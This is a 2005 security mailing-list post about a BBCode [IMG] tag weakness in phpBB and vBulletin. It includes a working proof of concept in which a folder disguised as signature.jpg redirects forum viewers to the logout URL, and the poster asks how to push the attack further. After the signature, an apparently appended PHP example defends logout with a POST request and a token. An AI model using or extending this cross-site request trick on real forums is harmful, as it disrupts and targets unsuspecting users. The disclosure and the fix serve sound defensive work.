Message-ID: <68cbfab105082115552e80f66b@mail.gmail.com>
Date: Sun Aug 21 23:55:32 2005
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: BBCode [IMG] [/IMG ] Tag Vulnerability

Hi,

Saw this one on www.waraxe.us (Discovered by Easyex) and I was
thinking if there are some more possibilities using the method
described. The POC below is for phpBB. -

==========
make yourself a folder on your host
rename the folder to signature.jpg
this will trick bbcode that it's an image file.

example http://sitewithmaliciouscode/signature.jpg 

inside that folder .. put this code .. 
and rename it to index.php file. 

Quote: 
<?php 
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true"); 
exit; 
?>

this will make every visitor get logged out when they view a thread that
has an image linked to this.
===================


This seems to be working on almost all the scripts using BBcode.
Successfully tested on vBulletin 3.0.7 and phpBB 2.0.17 when the
image link to the folder with the malicious code was used as the forum
signature. What I was wondering is: is there anything more serious than
logging out the users that can be done with this? The admin folders of
ipb and phpbb need reauthentication. So nothing serious for them, but
is there anything more innovative that could be done? And any way to fix this?

Regards,
-- 
http://www.h4cky0u.org
(In)Security at its best...
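On the "any way to fix this?" question: the [img] redirect can only ever produce a bare GET with the victim's cookies, so a logout handler that acts on `logout.php?logout=true` alone is the weak point. The following is an added example of a hardened logout handler, not phpBB's or vBulletin's own code; it assumes PHP 7 or later (for `random_bytes`/`hash_equals`) and a hypothetical `/phpBB/` install path, and the function and token names are the example's own.

```php
<?php
// Added example (not phpBB's own code): a logout handler that ignores the
// forced-GET trick. A bare GET to logout.php?logout=true, which is all an
// [img] redirect can make a browser send, no longer ends the session; the
// request must be a POST carrying a token that only the user's own page knows.
session_start();

// Issue one per-session token; render it into the real logout form, e.g.
// <form method="post" action="/phpBB/logout.php">
//   <input type="hidden" name="token" value="<?= csrf_token() ?>"><button>Log out</button></form>
function csrf_token(): string
{
    if (empty($_SESSION['logout_token'])) {
        $_SESSION['logout_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['logout_token'];
}

// Both conditions must hold: an <img> fetch is always a GET, so require POST,
// and the submitted token must equal the session copy (constant-time compare).
function is_genuine_logout(string $method, ?string $sent, ?string $expected): bool
{
    if ($method !== 'POST' || $sent === null || $expected === null) {
        return false;
    }
    return hash_equals($expected, $sent);
}

if (!is_genuine_logout($_SERVER['REQUEST_METHOD'],
                       $_POST['token'] ?? null,
                       $_SESSION['logout_token'] ?? null)) {
    // Redirect-driven or cross-site request: leave the session intact.
    http_response_code(403);
    echo 'Logout must be confirmed from within the forum.';
    exit;
}

// Genuine request: clear session data, expire the cookie, destroy the session.
$_SESSION = [];
if (ini_get('session.use_cookies')) {
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000,
              $p['path'], $p['domain'], $p['secure'], $p['httponly']);
}
session_destroy();
header('Location: /phpBB/index.php');
exit;
```

With this in place the attacker-hosted "signature.jpg" folder still redirects the browser, but the GET it triggers is refused and the viewer stays logged in.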
